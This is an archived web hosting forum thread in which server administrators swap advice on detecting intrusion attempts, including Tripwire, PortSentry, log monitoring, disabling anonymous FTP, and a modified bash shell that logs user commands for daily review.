Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : monitor for illegal activity

[Dexter]

Just wondering what people do/use to monitor for illegal activity like users trying to hack/crack to gain root access to the server. Anyone actually monitor or you just wait till it's happened then fix it?

JFTR I have a server and within the last 2 weeks it's been hit twice. Mostly likely by the same person(s) as they same useraccounts have been created. It's quite agrivating as I thought I had this system locked up pretty darn tight. It would be nice to have some sort of monitoring system to warn me when someones on the system messing around...

[JTY]

Well there are a lot of security apps, tripwire is one of them, which you can find on http://freshmeat.net/

[ck]

Hi everyone,

Please correct me if I'm wrong, but my knowledge of Tripwire is that it only notifies you *after* a compromise was made. IMHO, its not very effective against detering intruders but more of letting you know when your server was hacked into?

I'm also looking for a program which (hopefully) features intelligent detection and subsequent banning of users suspected of illegal activites against the server.

Anybody care to suggest whether such programs exist?

[Travis]

Unfortunately, most of the time, there *isn't* a way to catch a user before they compromise a system.

Let's face it, it's not like these people are typing "give me root access" at the prompt. Most exploits these days involve buffer overflows or other bad input checking by software running with privileges. You can't effectively monitor for intrusions via these methods, at least before it happens. What you can do is make sure that you've plugged up all known holes in your system.

Further complicating things is that anyone with root access can cover their tracks quite effectively. Remember, all data on the local system can be tampered with when a box is compromised, including monitoring and reporting systems.

There are a few things you can do in the way of monitoring, of course. You can filter and watch logs for repeated password failures, dumb users trying to su to root, etc. But ultimately, you will probably not know somebody has compromised your box until they have. That's where it's a must to have solid recovery procedures, and competent staff that can identify the exploit used and plug it up.

[Chicken]

I get a whole slew of anonymous ftp logins (anonymous ftp is not enabled on any domain). Every IP address on the machine is tried. I think someone mentioned that this is pretty common.

[Travis]

I see it all the time. Easy fix: turn off anonymous logins, or better yet, FTP if you don't need it.

[Chicken]

Yep, these are attempts. I don't turn on anon. ftp.

[cbaker17]

Red Hat is terrible about security.

The other daym we put up a new box, with no services running on it and all of a sudden one of the techs noticed it was generating like 4.5mbs of traffic, and nothing even on that box, it was crazy, im not sure what they found out the deal was.

[Félix C.Courtemanche]

Red Hat 6.2 and security freaks... go to http://www.openna.com/books/registration.htm and download a copy of the pdf of their book. It explains everything to do to secure a red hat system, including how to monitor logs, patch systems, monitor ports, everything.

It is very well written,... and IT'S FREE! (I love linux)

[inbuco]

I use port sentry, works very well and it's free.

Here you go, http://www.psionic.com/abacus/portsentry/

I hope that this helps.

[Toons]

In terms of monitoring users already on the servers (those that have telnet access), we use a modified version of bash, that logs all their commands directly to a file, which is then grepped once a day for various suspect words and anything interesting is mailed to the admins, we dont publicise the fact too much (not that we hide it either), so it hasnt put people off trying, but its certainly helped us catch several people trying various exploits, trying to DoS from our servers etc.

If anyone wants a copy, I can probably dig it out.

Regards,

Tony Lucas

[UnitedTec]

I would love to have a copy. Please contact me about it.

[CRego3D]

Please, me too that sounds like a terrific add-on

[kunal]

Could I have a copy to please?

[Toons]

Its at http://www.virtualhoster.co.uk/bash+xcal.tar.gz for those that are interested.

Logs to /var/log/.bashlogs.

Ill leave it up to you guys to write the cron scripts for it, as ours are integrated into other scripts.

Regards,

Tony Lucas